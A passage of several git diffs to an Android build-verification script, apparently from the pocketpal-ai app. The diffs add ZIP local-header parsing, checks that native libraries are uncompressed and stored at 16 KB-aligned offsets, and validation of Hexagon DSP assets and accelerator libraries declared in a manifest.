+ * wrapper beside it — whose name also contains "_hexagon", but which is a thin
+ * shim exporting stable Java_* entry points and none of the backend symbols.
+ * Mirrors the name convention llama.rn's own CMake uses to decide which
+ * variant gets the backend; were upstream to rename it, the ladder-coverage
+ * test fails first.
+ */
+function isAcceleratorLib(lib) {
+  return /_hexagon/.test(lib) && !/^librnllama_jni/.test(lib);
+}
+
 function refuseAbi(abi, manifestPath, why) {
   throw new Error(
     `${manifestPath} declares ${why} for ${abi.abi || '(unnamed ABI)'}.`,
@@ -168,9 +180,7 @@ function assertAbiStructure(abi, manifestPath) {
  * in the manifest covers it.
  *
  * Conditional because an ABI without an accelerator legitimately declares
- * none. The `_hexagon` test mirrors the name convention llama.rn's own CMake
- * uses to decide which variant gets the backend; were upstream to rename it,
- * the ladder-coverage test fails first.
+ * none.
  */
 function assertAcceleratorFloors(abi, manifestPath) {
   if (!abi.requiredLibs.some(lib => /_hexagon/.test(lib))) {
@@ -179,15 +189,9 @@ function assertAcceleratorFloors(abi, manifestPath) {
   // Not merely "a rule", but a rule that looks at the accelerator library
   // itself. Two near-misses both pass every other floor and both accept an
   // artifact with no backend: a rule pointing at librnllama.so, and a rule
-  // pointing at the accelerator's own JNI wrapper — whose name also contains
-  // "_hexagon", but which is a thin shim exporting stable Java_* entry points
-  // and none of the backend symbols.
+  // pointing at the accelerator's own JNI wrapper.
   if (
-    !(abi.requiredSymbols || []).some(
-      rule =>
-        /_hexagon/.test(rule.lib || '') &&
-        !/^librnllama_jni/.test(rule.lib || ''),
-    )
+    !(abi.requiredSymbols || []).some(rule => isAcceleratorLib(rule.lib || ''))
   ) {
     refuseAbi(
       abi,
@@ -227,6 +231,20 @@ function assertAssetFloors(manifest, manifestPath) {
   if (!Number.isInteger(assets.elfMachine)) {
     refuse('required assets but no elfMachine to check them against');
   }
+  if (!Array.isArray(assets.usableByAbis)) {
+    refuse(
+      'required assets but no usableByAbis to say which ABIs can load them',
+    );
+  }
+  // An ABI nobody declared is never enumerated against the artifact, so naming
+  // one here would be a claim the check silently never reaches.
+  const declaredAbis = new Set(manifest.abis.map(abi => abi.abi));
+  const unknown = assets.usableByAbis.filter(abi => !declaredAbis.has(abi));
+  if (unknown.length > 0) {
+    refuse(
+      `the assets usable by ${unknown.join(', ')}, which it does not declare as an ABI, so nothing would check that claim`,
+    );
+  }
 }
 
 function loadManifest(manifestPath) {
@@ -263,13 +281,7 @@ function loadManifest(manifestPath) {
   // accelerator library, so a manifest declaring none would satisfy all of
   // them vacuously — and the ABI enumeration only compares against what the
   // manifest names, so a tree carrying no ladder at all would pass.
-  if (
-    !manifest.abis.some(abi =>
-      abi.requiredLibs.some(
-        lib => /_hexagon/.test(lib) && !/^librnllama_jni/.test(lib),
-      ),
-    )
-  ) {
+  if (!manifest.abis.some(abi => abi.requiredLibs.some(isAcceleratorLib))) {
     throw new Error(
       `${manifestPath} declares no accelerator library for any ABI, so no backend would be checked.`,
     );
@@ -655,6 +667,8 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
     fail,
   });
 
+  const acceleratorCapableAbis = [];
+
   for (const abi of manifest.abis) {
     report.push(`  ${abi.abi}`);
 
@@ -689,6 +703,21 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
       `    extra rnllama libraries: ${extras.length > 0 ? extras.join(', ') : 'none'}`,
     );
 
+    // The whole tree, not the required list: the accelerator variant is itself
+    // required, so deriving this from what is left over would find nothing and
+    // refuse a correct artifact.
+    const canLoadAssets = [...entries].some(
+      entry =>
+        entry.startsWith(`${prefix}lib/${abi.abi}/`) &&
+        isAcceleratorLib(path.basename(entry)),
+    );
+    if (canLoadAssets) {
+      acceleratorCapableAbis.push(abi.abi);
+    }
+    report.push(
+      `    can load the DSP assets: ${canLoadAssets ? 'yes' : 'no'} (declared ${manifest.assets.usableByAbis.includes(abi.abi) ? 'yes' : 'no'})`,
+    );
+
     for (const rule of abi.requiredSymbols || []) {
       const entry = `${prefix}lib/${abi.abi}/${rule.lib}`;
       if (missingLibs.includes(entry)) {
@@ -696,6 +725,23 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
       }
       checkSymbolRule({rule, archive, artifactName, entry, report, fail});
     }
+  }
+
+  // Derived from the artifact rather than from the manifest that declares it:
+  // equality between two readings of the same document would hold whatever
+  // either said.
+  const declaredUsable = [...manifest.assets.usableByAbis].sort();
+  const observedUsable = [...acceleratorCapableAbis].sort();
+  if (declaredUsable.join(',') !== observedUsable.join(',')) {
+    fail(
+      [
+        `${artifactName} ships accelerator libraries for ${observedUsable.join(', ') || 'no ABI'},`,
+        `but the manifest declares the DSP assets usable by ${declaredUsable.join(', ') || 'no ABI'}.`,
+        'The assets are packaged once per artifact and cannot be scoped to an ABI, so this is a',
+        'declaration of who can load them, not a packaging rule. Either the accelerator ladder',
+        'moved to a different ABI, or usableByAbis in scripts/android-payload-manifest.json is stale.',
+      ].join('\n      '),
+    );
   }
 }
 

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -345,6 +345,15 @@ function loadManifest(manifestPath) {
       `${manifestPath} declares no accelerator library for any ABI, so no backend would be checked.`,
     );
   }
+  // Only `true` is accepted. The app maps its libraries in place; flipping
+  // this to say otherwise would silently retire both the offset rule and the
+  // stored requirement, which is the cheapest edit that unblocks a repacked
+  // artifact.
+  if (manifest.nativeLibsMappedInPlace !== true) {
+    throw new Error(
+      `${manifestPath} must declare nativeLibsMappedInPlace: true; the app ships extractNativeLibs=false, so every native library is mapped out of the APK rather than extracted.`,
+    );
+  }
   assertAssetFloors(manifest, manifestPath);
   for (const abi of manifest.abis) {
     assertAcceleratorFloors(abi, manifestPath);
@@ -435,17 +444,30 @@ function readElfMachine(buf) {
 /**
  * Where each entry's bytes actually start, and whether they are stored or
  * deflated. Read from the archive's own headers rather than from `unzip`,
- * which prints the *central* directory's extra-field length — the alignment
- * padding lives in the **local** header, and the two differ (0 against 599
- * bytes for `librnllama.so` in a release APK).
+ * which prints the *central* directory's extra-field length: the alignment
+ * padding lives in the **local** header, and the two differ. In a release APK
+ * the central value is 0 for every library while the local one is whatever it
+ * took to reach the next page boundary, so the difference is the whole field.
  */
 function readZipIndex(archive) {
   const fd = fs.openSync(archive, 'r');
+  // A short read is not an error to `fs.readSync`; it simply returns fewer
+  // bytes and leaves the rest of the buffer as it found it. Discarding the
+  // count means an offset past the end of the file is read as whatever the
+  // buffer held last, which for a reused buffer is the previous entry.
+  const readExactly = (buffer, length, position) => {
+    const got = fs.readSync(fd, buffer, 0, length, position);
+    if (got !== length) {
+      throw new Error(
+        `wanted ${length} bytes at ${position} but the archive gave ${got}`,
+      );
+    }
+  };
   try {
     const size = fs.fstatSync(fd).size;
     const tailLength = Math.min(size, 0xffff + 22);
     const tail = Buffer.alloc(tailLength);
-    fs.readSync(fd, tail, 0, tailLength, size - tailLength);
+    readExactly(tail, tailLength, size - tailLength);
 
     let eocd = -1;
     for (let at = tail.length - EOCD_SIZE; at >= 0; at--) {
@@ -473,10 +495,9 @@ function readZipIndex(archive) {
     }
 
     const directory = Buffer.alloc(directorySize);
-    fs.readSync(fd, directory, 0, directorySize, directoryAt);
+    readExactly(directory, directorySize, directoryAt);
 
     const index = new Map();
-    const local = Buffer.alloc(LOCAL_HEADER_SIZE);
     let at = 0;
     for (let i = 0; i < count; i++) {
       if (directory.readUInt32LE(at) !== CENTRAL_SIGNATURE) {
@@ -489,7 +510,8 @@ function readZipIndex(archive) {
       const localAt = directory.readUInt32LE(at + 42);
       const name = directory.toString('utf-8', at + 46, at + 46 + nameLength);
 
-      fs.readSync(fd, local, 0, LOCAL_HEADER_SIZE, localAt);
+      const local = Buffer.alloc(LOCAL_HEADER_SIZE);
+      readExactly(local, LOCAL_HEADER_SIZE, localAt);
       if (local.readUInt32LE(0) !== LOCAL_SIGNATURE) {
         throw new Error(`the local header of ${name} is malformed`);
       }
@@ -585,7 +607,7 @@ function readCString(buf, offset, limit) {
  * calibrated against.
  */
 function readDynsym(buf) {
-  if (buf.length < ELF64_SHDR_SIZE) {
+  if (buf.length < ELF64_EHDR_SIZE) {
     throw new Error('file is too short to be an ELF object');
   }
   if (buf.readUInt32BE(0) !== 0x7f454c46) {
@@ -908,21 +930,43 @@ function checkAlignment({
     return;
   }
 
-  // Stored entries only. A deflated library is extracted to disk at install
-  // (legacy packaging) rather than mapped out of the archive, so its offset
-  // decides nothing — and an APK where every library is deflated legitimately
-  // has nothing to check here, which the counts make visible rather than
-  // silently reporting as a pass.
-  const mapped = libs.filter(entry => zipIndex.get(entry)?.stored);
-  const misplaced = mapped.filter(
-    entry => zipIndex.get(entry).dataOffset % declared !== 0,
+  // Every library, not only the stored ones. The app maps its libraries out of
+  // the APK, so a deflated entry is not a library checked under some other
+  // rule — it is one the loader cannot map at all, on any device. Skipping it
+  // here would excuse the more serious fault of the two.
+  const missing = libs.filter(entry => !zipIndex.has(entry));
+  for (const entry of missing) {
+    report.push(`      UNINDEXED  ${entry}`);
+    fail(
+      [
+        `${entry} is listed in ${artifactName} but absent from its central directory.`,
+        'The payload check could not run, so it reports failure rather than success —',
+        'a check that cannot read the artifact has proven nothing about it.',
+      ].join('\n      '),
+    );
+  }
+  const indexed = libs.filter(entry => zipIndex.has(entry));
+  const deflated = indexed.filter(entry => !zipIndex.get(entry).stored);
+  const misplaced = indexed.filter(
+    entry =>
+      zipIndex.get(entry).stored &&
+      zipIndex.get(entry).dataOffset % declared !== 0,
   );
   report.push(
-    `    zip data offset: ${mapped.length - misplaced.length}/${mapped.length} stored libraries at a multiple of ${declared}` +
-      (mapped.length < libs.length
-        ? ` (${libs.length - mapped.length} deflated, extracted at install)`
-        : ''),
+    `    zip data offset: ${indexed.length - deflated.length - misplaced.length}/${indexed.length} libraries stored at a multiple of ${declared}`,
   );
+  for (const entry of deflated) {
+    report.push(`      DEFLATED  ${entry}`);
+    fail(
+      [
+        `${entry} in ${artifactName} is compressed inside the archive.`,
+        'scripts/android-payload-manifest.json declares nativeLibsMappedInPlace, so the platform maps',
+        'this library straight out of the APK and never extracts it — a compressed entry cannot be',
+        'mapped and will fail to load on every device. Either the artifact was repacked after the',
+        'build, or packaging changed to useLegacyPackaging and the manifest has to say so.',
+      ].join('\n      '),
+    );
+  }
   for (const entry of misplaced) {
     const offset = zipIndex.get(entry).dataOffset;
     report.push(`      MISPLACED  ${entry} (data offset ${offset})`);

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -150,9 +150,6 @@ function assertAbiStructure(abi, manifestPath) {
   ) {
     refuseAbi(abi, manifestPath, 'no required libraries');
   }
-  if (abi.requiredAssets !== undefined && !Array.isArray(abi.requiredAssets)) {
-    refuseAbi(abi, manifestPath, 'a requiredAssets that is not a list');
-  }
   if (
     abi.requiredSymbols !== undefined &&
     !Array.isArray(abi.requiredSymbols)
@@ -166,14 +163,14 @@ function assertAbiStructure(abi, manifestPath) {
 
 /**
  * An ABI that carries an accelerator variant has to demand the things that
- * make it work. Both lists degrade the same silent way: emptying one is the
- * cheapest edit that unblocks a build, the rule simply stops being checked,
- * and nothing else in the manifest covers it.
+ * make it work. The list degrades silently: emptying it is the cheapest edit
+ * that unblocks a build, the rule simply stops being checked, and nothing else
+ * in the manifest covers it.
  *
  * Conditional because an ABI without an accelerator legitimately declares
- * neither. The `_hexagon` test mirrors the name convention llama.rn's own
- * CMake uses to decide which variant gets the backend; were upstream to rename
- * it, the ladder-coverage test fails first.
+ * none. The `_hexagon` test mirrors the name convention llama.rn's own CMake
+ * uses to decide which variant gets the backend; were upstream to rename it,
+ * the ladder-coverage test fails first.
  */
 function assertAcceleratorFloors(abi, manifestPath) {
   if (!abi.requiredLibs.some(lib => /_hexagon/.test(lib))) {
@@ -198,22 +195,37 @@ function assertAcceleratorFloors(abi, manifestPath) {
       'an accelerator library but no symbol rule examining it',
     );
   }
-  // The DSP libraries are extracted as a set at runtime and the backend is
-  // disabled outright if any one is missing, so a compiled-in backend with no
-  // assets is dead on the device.
-  if ((abi.requiredAssets || []).length === 0) {
-    refuseAbi(
-      abi,
-      manifestPath,
-      'an accelerator library but no required assets',
+}
+
+/**
+ * The DSP libraries are extracted as a set at runtime and the backend is
+ * disabled outright if any one is missing, so a compiled-in accelerator with
+ * no assets is dead on the device.
+ *
+ * Unconditional because `loadManifest` refuses a manifest with no accelerator
+ * ABI before reaching here; these floors would otherwise need that condition.
+ */
+function assertAssetFloors(manifest, manifestPath) {
+  const refuse = why => {
+    throw new Error(`${manifestPath} declares ${why}.`);
+  };
+  const assets = manifest.assets;
+  if (!assets || typeof assets !== 'object' || Array.isArray(assets)) {
+    refuse('no assets block, so no DSP payload would be checked');
+  }
+  // One legal value, so this cannot fail on a correct manifest. It exists so a
+  // maintainer reaching for "abi" is told why no packaging mechanism delivers
+  // it, rather than shipping a scope nothing implements.
+  if (assets.scope !== 'artifact') {
+    refuse(
+      `an asset scope of ${JSON.stringify(assets.scope)}; only "artifact" is deliverable, because Android packages assets/ once per artifact and not per ABI`,
     );
   }
-  if (!Number.isInteger(abi.requiredAssetElfMachine)) {
-    refuseAbi(
-      abi,
-      manifestPath,
-      'required assets but no requiredAssetElfMachine to check them against',
-    );
+  if (!Array.isArray(assets.required) || assets.required.length === 0) {
+    refuse('an accelerator library but no required assets');
+  }
+  if (!Number.isInteger(assets.elfMachine)) {
+    refuse('required assets but no elfMachine to check them against');
   }
 }
 
@@ -262,6 +274,7 @@ function loadManifest(manifestPath) {
       `${manifestPath} declares no accelerator library for any ABI, so no backend would be checked.`,
     );
   }
+  assertAssetFloors(manifest, manifestPath);
   for (const abi of manifest.abis) {
     assertAcceleratorFloors(abi, manifestPath);
   }
@@ -510,6 +523,78 @@ function checkSymbolRule({rule, archive, artifactName, entry, report, fail}) {
   }
 }
 
+/**
+ * The DSP assets, once per artifact: Android packages `assets/` once, not per
+ * ABI, so checking them inside the ABI loop would report the same four entries
+ * as many times as there are declared ABIs.
+ */
+function checkAssets({
+  archive,
+  prefix,
+  entries,
+  assets,
+  artifactName,
+  report,
+  fail,
+}) {
+  const missing = assets.required.filter(
+    asset => !entries.has(`${prefix}${asset}`),
+  );
+  report.push(
+    `  assets: ${assets.required.length - missing.length}/${assets.required.length} present`,
+  );
+
+  // Presence by filename is not enough: a file of the right name that is not a
+  // DSP library leaves the backend as dead on the device as a missing one, and
+  // would report PASS.
+  for (const asset of assets.required.filter(
+    candidate => !missing.includes(candidate),
+  )) {
+    const entry = `${prefix}${asset}`;
+    let machine;
+    try {
+      machine = readElfMachine(readZipEntry(archive, entry));
+    } catch (err) {
+      report.push(`    UNREADABLE  ${entry} — ${err.message}`);
+      fail(
+        [
+          `could not read ${entry} in ${artifactName}: ${err.message}.`,
+          'The payload check could not run, so it reports failure rather than success —',
+          'a check that cannot read the artifact has proven nothing about it.',
+        ].join('\n      '),
+      );
+      continue;
+    }
+    if (machine !== assets.elfMachine) {
+      report.push(
+        `    WRONG MACHINE  ${entry} (e_machine ${machine}, expected ${assets.elfMachine})`,
+      );
+      fail(
+        [
+          `${entry} in ${artifactName} is not a DSP library: its ELF e_machine is ${machine},`,
+          `and the manifest requires ${assets.elfMachine}.`,
+          'A file of the right name that the DSP cannot load disables the Hexagon backend just as',
+          'surely as a missing one. Check that llama.rn shipped real bin/arm64-v8a payloads.',
+        ].join('\n      '),
+      );
+    }
+  }
+
+  for (const asset of missing) {
+    report.push(`    MISSING  ${prefix}${asset}`);
+    fail(
+      [
+        `${artifactName} is missing ${prefix}${asset}.`,
+        'All four DSP libraries are required, not only the one a given device uses:',
+        'RNLlama.java extracts them as a set and disables the Hexagon backend entirely',
+        'if any one is absent. They are synced into the artifact from',
+        "node_modules/llama.rn/bin/arm64-v8a by llama.rn's syncRNLlamaHtpAssets task —",
+        'check that the dependency installed completely.',
+      ].join('\n      '),
+    );
+  }
+}
+
 function checkArtifact({archive, kind, manifest, report, failures}) {
   const artifactName = path.basename(archive);
   const prefix = kind === 'aab' ? 'base/' : '';
@@ -560,6 +645,16 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
     );
   }
 
+  checkAssets({
+    archive,
+    prefix,
+    entries,
+    assets: manifest.assets,
+    artifactName,
+    report,
+    fail,
+  });
+
   for (const abi of manifest.abis) {
     report.push(`  ${abi.abi}`);
 
@@ -581,65 +676,6 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
           'The build did not produce every library the manifest requires. If the variant allowlist',
           '(ORG_GRADLE_PROJECT_rnllamaVariants) was narrowed, widen it to match the manifest; if the',
           'manifest is what changed, update scripts/android-payload-manifest.json in the same pull request.',
-        ].join('\n      '),
-      );
-    }
-
-    const missingAssets = (abi.requiredAssets || []).filter(
-      asset => !entries.has(`${prefix}${asset}`),
-    );
-    // Printed even when nothing is declared: the summary line claims assets
-    // were checked, so a manifest that declares none has to be visible here.
-    const requiredAssets = abi.requiredAssets || [];
-    report.push(
-      `    assets: ${requiredAssets.length - missingAssets.length}/${requiredAssets.length} present`,
-    );
-    // Presence by filename is not enough: a file of the right name that is not
-    // a DSP library leaves the backend as dead on the device as a missing one,
-    // and would report PASS.
-    for (const asset of (abi.requiredAssets || []).filter(
-      candidate => !missingAssets.includes(candidate),
-    )) {
-      const entry = `${prefix}${asset}`;
-      let machine;
-      try {
-        machine = readElfMachine(readZipEntry(archive, entry));
-      } catch (err) {
-        report.push(`      UNREADABLE  ${entry} — ${err.message}`);
-        fail(
-          [
-            `could not read ${entry} in ${artifactName}: ${err.message}.`,
-            'The payload check could not run, so it reports failure rather than success —',
-            'a check that cannot read the artifact has proven nothing about it.',
-          ].join('\n      '),
-        );
-        continue;
-      }
-      if (machine !== abi.requiredAssetElfMachine) {
-        report.push(
-          `      WRONG MACHINE  ${entry} (e_machine ${machine}, expected ${abi.requiredAssetElfMachine})`,
-        );
-        fail(
-          [
-            `${entry} in ${artifactName} is not a DSP library: its ELF e_machine is ${machine},`,
-            `and the manifest requires ${abi.requiredAssetElfMachine}.`,
-            'A file of the right name that the DSP cannot load disables the Hexagon backend just as',
-            'surely as a missing one. Check that llama.rn shipped real bin/arm64-v8a payloads.',
-          ].join('\n      '),
-        );
-      }
-    }
-
-    for (const asset of missingAssets) {
-      report.push(`      MISSING  ${prefix}${asset}`);
-      fail(
-        [
-          `${artifactName} is missing ${prefix}${asset}.`,
-          'All four DSP libraries are required, not only the one a given device uses:',
-          'RNLlama.java extracts them as a set and disables the Hexagon backend entirely',
-          'if any one is absent. They are synced into the artifact from',
-          "node_modules/llama.rn/bin/arm64-v8a by llama.rn's syncRNLlamaHtpAssets task —",
-          'check that the dependency installed completely.',
         ].join('\n      '),
       );
     }

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -42,11 +42,18 @@ const ELF32_PHDR_SIZE = 32;
 const ELF64_PHDR_SIZE = 56;
 const ELF32_EHDR_SIZE = 52;
 const ELF64_EHDR_SIZE = 64;
+const EOCD_SIGNATURE = 0x06054b50;
+const CENTRAL_SIGNATURE = 0x02014b50;
+const LOCAL_SIGNATURE = 0x04034b50;
+const EOCD_SIZE = 22;
+const LOCAL_HEADER_SIZE = 30;
 
-// What the NDK already produces (`-Wl,-z,max-page-size=16384`) and what
-// Android 15+ requires of shared libraries on 16 KB-page devices. The manifest
-// declares the requirement per ABI; this is only the floor it cannot undercut,
-// because a lowered number is the cheapest edit that unblocks a failing build.
+// The page size a 16 KB-page device maps at. Two separate properties are held
+// to it — the linker's `p_align` (`-Wl,-z,max-page-size=16384`) and the zip
+// data offset the packager placed the library at — and a library needs both to
+// load; neither on its own is the Android 15 requirement. The manifest declares
+// the number per ABI; this is only the floor it cannot undercut, because a
+// lowered number is the cheapest edit that unblocks a failing build.
 const MIN_LIB_ALIGNMENT = 16384;
 
 function usage() {
@@ -178,6 +185,18 @@ function assertAbiStructure(abi, manifestPath) {
     !Array.isArray(abi.requiredSymbols)
   ) {
     refuseAbi(abi, manifestPath, 'a requiredSymbols that is not a list');
+  }
+  // The assets moved to a top-level block, and a key nothing reads is worse
+  // than a missing one: an editor working from the old shape declares assets,
+  // is never told they are ignored, and gets a green gate.
+  for (const abandoned of ['requiredAssets', 'requiredAssetElfMachine']) {
+    if (abi[abandoned] !== undefined) {
+      refuseAbi(
+        abi,
+        manifestPath,
+        `a per-ABI ${abandoned}, which nothing reads; the DSP assets are declared once in the top-level "assets" block`,
+      );
+    }
   }
   for (const rule of abi.requiredSymbols || []) {
     assertRuleDemandsSomething(rule, manifestPath);
@@ -411,6 +430,83 @@ function readElfMachine(buf) {
   }
   const littleEndian = buf[5] === 1;
   return littleEndian ? buf.readUInt16LE(18) : buf.readUInt16BE(18);
+}
+
+/**
+ * Where each entry's bytes actually start, and whether they are stored or
+ * deflated. Read from the archive's own headers rather than from `unzip`,
+ * which prints the *central* directory's extra-field length — the alignment
+ * padding lives in the **local** header, and the two differ (0 against 599
+ * bytes for `librnllama.so` in a release APK).
+ */
+function readZipIndex(archive) {
+  const fd = fs.openSync(archive, 'r');
+  try {
+    const size = fs.fstatSync(fd).size;
+    const tailLength = Math.min(size, 0xffff + 22);
+    const tail = Buffer.alloc(tailLength);
+    fs.readSync(fd, tail, 0, tailLength, size - tailLength);
+
+    let eocd = -1;
+    for (let at = tail.length - EOCD_SIZE; at >= 0; at--) {
+      if (tail.readUInt32LE(at) === EOCD_SIGNATURE) {
+        eocd = at;
+        break;
+      }
+    }
+    if (eocd === -1) {
+      throw new Error('no end-of-central-directory record');
+    }
+    const count = tail.readUInt16LE(eocd + 10);
+    const directorySize = tail.readUInt32LE(eocd + 12);
+    const directoryAt = tail.readUInt32LE(eocd + 16);
+    // Guessing past a ZIP64 marker would silently read the wrong offsets, so
+    // it fails instead; no artifact this gate judges is near those limits.
+    if (
+      count === 0xffff ||
+      directorySize === 0xffffffff ||
+      directoryAt === 0xffffffff
+    ) {
+      throw new Error(
+        'the archive uses ZIP64, which this reader does not parse',
+      );
+    }
+
+    const directory = Buffer.alloc(directorySize);
+    fs.readSync(fd, directory, 0, directorySize, directoryAt);
+
+    const index = new Map();
+    const local = Buffer.alloc(LOCAL_HEADER_SIZE);
+    let at = 0;
+    for (let i = 0; i < count; i++) {
+      if (directory.readUInt32LE(at) !== CENTRAL_SIGNATURE) {
+        throw new Error('a central directory entry is malformed');
+      }
+      const method = directory.readUInt16LE(at + 10);
+      const nameLength = directory.readUInt16LE(at + 28);
+      const extraLength = directory.readUInt16LE(at + 30);
+      const commentLength = directory.readUInt16LE(at + 32);
+      const localAt = directory.readUInt32LE(at + 42);
+      const name = directory.toString('utf-8', at + 46, at + 46 + nameLength);
+
+      fs.readSync(fd, local, 0, LOCAL_HEADER_SIZE, localAt);
+      if (local.readUInt32LE(0) !== LOCAL_SIGNATURE) {
+        throw new Error(`the local header of ${name} is malformed`);
+      }
+      index.set(name, {
+        stored: method === 0,
+        dataOffset:
+          localAt +
+          LOCAL_HEADER_SIZE +
+          local.readUInt16LE(26) +
+          local.readUInt16LE(28),
+      });
+      at += 46 + nameLength + extraLength + commentLength;
+    }
+    return index;
+  } finally {
+    fs.closeSync(fd);
+  }
 }
 
 /**
@@ -711,6 +807,13 @@ function checkAssets({
  * property of what the platform loads, and the libraries this manifest does
  * not name are loaded by the same linker on the same device.
  *
+ * Two properties, not one. `p_align` is what the linker wrote into the object;
+ * the **zip data offset** is where that object sits in the archive. The app
+ * ships `extractNativeLibs=false`, so bionic maps each `.so` in place out of
+ * the APK and both have to be 16 KB-aligned — an artifact with conforming
+ * segments at unaligned offsets cannot `dlopen` on a 16 KB-page device, and
+ * asserting only the first certifies exactly that artifact.
+ *
  * The DSP assets are deliberately outside the subject set. They are ELF32
  * Hexagon objects at `p_align` 4096, loaded by the DSP rather than by Android,
  * so one floor spanning both would fail the gate on a correct artifact.
@@ -721,6 +824,7 @@ function checkAlignment({
   entries,
   abi,
   artifactName,
+  zipIndex,
   report,
   fail,
 }) {
@@ -799,6 +903,39 @@ function checkAlignment({
       );
     }
   }
+
+  if (!zipIndex) {
+    return;
+  }
+
+  // Stored entries only. A deflated library is extracted to disk at install
+  // (legacy packaging) rather than mapped out of the archive, so its offset
+  // decides nothing — and an APK where every library is deflated legitimately
+  // has nothing to check here, which the counts make visible rather than
+  // silently reporting as a pass.
+  const mapped = libs.filter(entry => zipIndex.get(entry)?.stored);
+  const misplaced = mapped.filter(
+    entry => zipIndex.get(entry).dataOffset % declared !== 0,
+  );
+  report.push(
+    `    zip data offset: ${mapped.length - misplaced.length}/${mapped.length} stored libraries at a multiple of ${declared}` +
+      (mapped.length < libs.length
+        ? ` (${libs.length - mapped.length} deflated, extracted at install)`
+        : ''),
+  );
+  for (const entry of misplaced) {
+    const offset = zipIndex.get(entry).dataOffset;
+    report.push(`      MISPLACED  ${entry} (data offset ${offset})`);
+    fail(
+      [
+        `${entry} in ${artifactName} begins at byte ${offset}, which is not a multiple of ${declared}.`,
+        'The app sets extractNativeLibs=false, so this library is mapped in place out of the APK and',
+        'a 16 KB-page device cannot load it from an unaligned offset — the segment alignment above',
+        'says nothing about this. Alignment padding is inserted by the Android Gradle Plugin when it',
+        'packages the archive, so a failure here means the artifact was repacked or zipaligned away.',
+      ].join('\n      '),
+    );
+  }
 }
 
 function checkArtifact({archive, kind, manifest, report, failures}) {
@@ -851,6 +988,25 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
     );
   }
 
+  // Only an APK is mapped in place. A bundle is repackaged by bundletool on
+  // the way to the device, so its offsets say nothing about what installs.
+  let zipIndex = null;
+  if (kind === 'apk') {
+    try {
+      zipIndex = readZipIndex(archive);
+    } catch (err) {
+      report.push(`  UNREADABLE — ${err.message}`);
+      fail(
+        [
+          `could not read the archive layout of ${artifactName}: ${err.message}.`,
+          'The payload check could not run, so it reports failure rather than success —',
+          'a check that cannot read the artifact has proven nothing about it.',
+        ].join('\n      '),
+      );
+      return;
+    }
+  }
+
   checkAssets({
     archive,
     prefix,
@@ -894,6 +1050,7 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
       entries,
       abi,
       artifactName,
+      zipIndex,
       report,
       fail,
     });
@@ -1007,4 +1164,9 @@ if (require.main === module) {
   }
 }
 
-module.exports = {readDynsym, readProgramHeaders, variantsFromManifest};
+module.exports = {
+  readDynsym,
+  readProgramHeaders,
+  readZipIndex,
+  variantsFromManifest,
+};

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -850,12 +850,29 @@ function checkAlignment({
   report,
   fail,
 }) {
-  const libs = [...entries]
-    .filter(
-      entry =>
-        entry.startsWith(`${prefix}lib/${abi.abi}/`) && entry.endsWith('.so'),
-    )
+  // Named from the archive's own central directory when there is one. `unzip`
+  // transliterates bytes it cannot render, so a subject set built from its
+  // listing and an index built from the directory disagree on exactly the
+  // entries whose naming is chosen freely.
+  const inTree = name =>
+    name.startsWith(`${prefix}lib/${abi.abi}/`) && name.endsWith('.so');
+  const libs = (zipIndex ? [...zipIndex.keys()] : [...entries])
+    .filter(inTree)
     .sort();
+  const listed = [...entries].filter(inTree).sort();
+  if (zipIndex && listed.join('\n') !== libs.join('\n')) {
+    report.push(
+      `      UNREADABLE  ${prefix}lib/${abi.abi}/ — the entry listing and the archive layout name different libraries`,
+    );
+    fail(
+      [
+        `${artifactName} lists ${listed.length} libraries under ${prefix}lib/${abi.abi}/ but its central directory names ${libs.length}.`,
+        'The two readings of one archive disagree, so neither can be trusted to say what ships.',
+        'The payload check could not run, so it reports failure rather than success —',
+        'a check that cannot read the artifact has proven nothing about it.',
+      ].join('\n      '),
+    );
+  }
   const declared = abi.requiredLibAlignment;
   const judged = libs.map(entry => {
     try {
@@ -934,10 +951,19 @@ function checkAlignment({
   // the APK, so a deflated entry is not a library checked under some other
   // rule — it is one the loader cannot map at all, on any device. Skipping it
   // here would excuse the more serious fault of the two.
-  // Both readings come from the same central directory — `unzip -Z1` lists it
-  // and `readZipIndex` walks it — so an entry can only be absent here if the
-  // directory itself is malformed, which the reader refuses outright.
   const indexed = libs.filter(entry => zipIndex.has(entry));
+  // A library dropped between the subject set and the index would otherwise
+  // shrink the denominator and read as a clean pass over fewer things.
+  for (const entry of libs.filter(name => !zipIndex.has(name))) {
+    report.push(`      UNINDEXED  ${entry}`);
+    fail(
+      [
+        `${entry} is listed in ${artifactName} but absent from its central directory.`,
+        'The payload check could not run, so it reports failure rather than success —',
+        'a check that cannot read the artifact has proven nothing about it.',
+      ].join('\n      '),
+    );
+  }
   const deflated = indexed.filter(entry => !zipIndex.get(entry).stored);
   const misplaced = indexed.filter(
     entry =>
@@ -945,7 +971,7 @@ function checkAlignment({
       zipIndex.get(entry).dataOffset % declared !== 0,
   );
   report.push(
-    `    zip data offset: ${indexed.length - deflated.length - misplaced.length}/${indexed.length} libraries stored at a multiple of ${declared}`,
+    `    zip data offset: ${indexed.length - deflated.length - misplaced.length}/${libs.length} libraries stored at a multiple of ${declared}`,
   );
   for (const entry of deflated) {
     report.push(`      DEFLATED  ${entry}`);

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -35,8 +35,12 @@ const ISSUE_URL = 'https://github.com/a-ghorbani/pocketpal-ai/issues/858';
 
 const SHT_DYNSYM = 11;
 const SHN_UNDEF = 0;
+const PT_LOAD = 1;
 const ELF64_SYM_SIZE = 24;
 const ELF64_SHDR_SIZE = 64;
+const ELF32_PHDR_SIZE = 32;
+const ELF64_PHDR_SIZE = 56;
+const ELF32_EHDR_SIZE = 52;
 
 function usage() {
   return [
@@ -366,6 +370,60 @@ function readElfMachine(buf) {
   }
   const littleEndian = buf[5] === 1;
   return littleEndian ? buf.readUInt16LE(18) : buf.readUInt16BE(18);
+}
+
+/**
+ * Every program header, in file order. Both ELF classes and both byte orders,
